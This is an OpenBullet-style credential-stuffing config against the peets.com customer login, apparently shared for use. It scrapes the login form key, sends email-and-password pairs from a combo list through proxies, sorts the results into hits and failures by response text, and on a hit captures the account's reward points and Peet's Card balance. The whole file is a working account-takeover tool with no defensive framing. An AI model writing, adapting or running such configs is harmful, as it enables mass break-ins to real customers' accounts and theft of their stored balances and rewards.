[SETTINGS]
{
  "Name": "peets.com",
  "SuggestedBots": 1,
  "LastModified": "2018-08-19T19:37:03.3063648+00:00",
  "AdditionalInfo": "",
  "Author": "Nazgul",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET REQUEST GET "https://www.peets.com/customer/account/login/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; OPPO R9s Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.peets.com/customer/account/login/" 
#KEY PARSE "<SOURCE>" LR "<input name=\"form_key\" type=\"hidden\" value=\"" "\" />" Recursive=FALSE -> VAR "key" "" "" 
#POST REQUEST POST "https://www.peets.com/customer/account/loginPost/" AutoRedirect=TRUE 
  CONTENT "form_key=<key>&login%5Busername%5D=<USER>&login%5Bpassword%5D=<PASS>&persistent_remember_me=on&send=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; OPPO R9s Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.peets.com" 
  HEADER "Referer: https://www.peets.com/customer/account/login/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid login or password" 
  KEYCHAIN Success OR 
    KEY "\">Until your next reward</div>" 
PARSE "<SOURCE>" LR "<span class=\"qty\">(" ")</span>" Recursive=FALSE -> CAP "Rewards" "" "" 
PARSE "<SOURCE>" LR " <div class=\"balance-value\"><span class=\"price\">" "</span></div>" Recursive=FALSE -> CAP "Peet's Cards" "" "" 
